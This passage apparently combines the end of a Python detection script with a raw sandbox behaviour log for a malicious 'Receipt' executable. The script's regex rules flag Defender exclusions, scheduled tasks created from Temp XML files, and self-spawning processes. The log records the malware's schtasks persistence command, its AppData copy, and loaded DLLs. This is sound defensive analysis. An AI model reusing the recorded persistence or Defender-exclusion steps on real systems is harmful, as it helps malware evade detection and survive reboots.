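     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"'),
    (r"C:\Users\user\Desktop\Receipt-#202431029B.exe",
     r'"C:\Users\user\Desktop\Receipt-#202431029B.exe"'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (r"C:\Windows\explorer.exe",
     r'"C:\Windows\System32\schtasks.exe" /Query /TN "Microsoft\Windows\Defrag\ScheduledDefrag"'),
]

# First token of a command line: either a quoted path or a bare one.
_FIRST_TOKEN = re.compile(r'\s*(?:"([^"]+)"|(\S+))')
# Add-MpPreference with any of the three exclusion switches; captures the target.
_EXCLUSION = re.compile(
    r'add-mppreference\b.*?-exclusion(?:path|process|extension)\s+(?:"([^"]+)"|(\S+))', re.I)
# schtasks /Create whose task definition is a .tmp file inside a Temp directory.
_TASK_XML_TEMP = re.compile(r'/create\b.*?/xml\s+"?([^"\s]*\\temp\\[^"\s]*\.tmp)', re.I)
_USER_PROFILE = re.compile(r"[a-z]:\\users\\", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    detail: str
    severity: str


def image_path(cmdline: str) -> str:
    """Executable path at the start of a command line, quotes removed, lower-cased."""
    m = _FIRST_TOKEN.match(cmdline)
    return ((m.group(1) or m.group(2)) if m else "").lower()


def image_name(cmdline: str) -> str:
    """File name of the executable a command line starts with."""
    return image_path(cmdline).rsplit("\\", 1)[-1]


def under_user_profile(path: str) -> bool:
    """True when the path lives under a user profile (user-writable location)."""
    return _USER_PROFILE.match(path) is not None


def analyze(events):
    """Apply the three rules to (parent, cmdline) pairs; return findings in input order."""
    findings = []
    for parent, cmdline in events:
        name = image_name(cmdline)
        if name in ("powershell.exe", "pwsh.exe"):
            m = _EXCLUSION.search(cmdline)
            if m:
                target = m.group(1) or m.group(2)
                sev = "high" if under_user_profile(target) else "medium"
                findings.append(Finding("defender_exclusion", parent, target, sev))
        if name == "schtasks.exe":
            m = _TASK_XML_TEMP.search(cmdline)
            if m:
                findings.append(Finding("schtasks_xml_from_temp", parent, m.group(1), "high"))
        child = image_path(cmdline)
        if child and child == parent.lower():
            sev = "high" if under_user_profile(child) else "medium"
            findings.append(Finding("self_spawn", parent, child, sev))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.detail} (parent: {f.parent})")
```

The self-spawn rule on its own is noisy for some installers and updaters; in a production rule it belongs in a correlation with the other two (same parent PID within a short window), which is exactly the sequence the entries above show.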
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: dwrite.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: edputil.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: netutils.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: appresolver.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: slc.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: sppc.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: sxs.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: mpr.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: scrrun.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: linkinfo.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ntshrui.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: cscapi.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: edputil.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: avicap32.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: msvfw32.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: winmm.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: dwrite.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Notepab.lnk.8.drLNK file: ..\..\..\..\..\Notepab.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Receipt-#202431029B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Receipt-#202431029B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Receipt-#202431029B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: \??\C:\Windows\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbyhR source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb0 source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Users\user\Desktop\Receipt-#202431029B.PDB source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb` source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbahz source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Core.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007523000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdblX source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Windows.Forms.pdbxX source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: RVYv.pdbSHA256 source: Receipt-#202431029B.exe, XetHVID.exe.0.dr, Notepab.exe.8.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: Microsoft.VisualBasic.pdbP source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Users\user\Desktop\RVYv.pdb, source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.pdb@ source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbHH source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Xml.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: o.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: %%.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007519000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp, WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\RVYv.pdbpdbVYv.pdb@V source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
